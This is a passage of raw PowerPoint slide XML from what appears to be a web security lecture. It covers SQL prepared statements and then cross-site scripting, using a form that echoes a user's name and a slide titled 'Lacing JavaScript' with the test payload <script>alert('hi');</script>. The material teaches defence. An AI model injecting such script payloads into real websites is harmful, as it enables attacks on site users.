                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setBoolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>99)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>returns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>changed</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>executeUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7160442" y="2667000"/>
            <a:ext cx="1907358" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -154013"/>
              <a:gd name="adj2" fmla="val 18818"/>
              <a:gd name="adj3" fmla="val 16667"/>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000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Similar methods for other SQL types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Brace 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="3352800"/>
            <a:ext cx="228600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Snip and Round Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5638623"/>
            <a:ext cx="8229600" cy="990777"/>
          </a:xfrm>
          <a:prstGeom prst="snip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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prepared queries stop us from mixing data with code!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22491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Cross Site Scripting (XSS)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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="762927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dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross site scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is the ability to get a website to display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>user-supplied</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> content laced with malicious HTML/JavaScript” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:b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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359206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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2012-07-02 at 3.31.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1168400"/>
            <a:ext cx="3441700" cy="1270000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2012-07-02 at 3.3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800" y="1143000"/>
            <a:ext cx="3073400" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Snip Single Corner Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3173506"/>
            <a:ext cx="6400800" cy="2058894"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form name="XSS" action="#" method="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p&gt;What's your name?&lt;/p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="text" name="name"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="submit" value="Submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pre&gt;Hello David&lt;/pre&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1651000"/>
            <a:ext cx="685800" cy="381000"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4572000" y="2438400"/>
            <a:ext cx="2349500" cy="73510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073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7-02 at 3.3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150" y="1463862"/>
            <a:ext cx="3187700" cy="1435100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Snip Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3579906"/>
            <a:ext cx="7315200" cy="2211294"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="66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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>form name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>XSS" action="#" method="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>GET”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>p&gt;What's your name?&lt;/p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="text" name="name"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="submit" value="Submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>pre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&gt;Hello David&lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/pre&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="2"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2898962"/>
            <a:ext cx="0" cy="68094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33600" y="5448300"/>
            <a:ext cx="1828800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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5" name="Rounded Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455024" y="5692775"/>
            <a:ext cx="3200400" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97864"/>
              <a:gd name="adj2" fmla="val -49545"/>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HTML chars not stripped</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3255147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2-07-02 at 4.08.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600" y="1524000"/>
            <a:ext cx="3251200" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lacing JavaScript</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="5448300"/>
            <a:ext cx="3810000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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6" name="Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1778000"/>
            <a:ext cx="4648200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64783"/>
              <a:gd name="adj2" fmla="val -17332"/>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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“hi”);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="Screen Shot 2012-07-02 at 4.05.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950" y="2971800"/>
            <a:ext cx="6489700" cy="3251200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2902222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nip Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
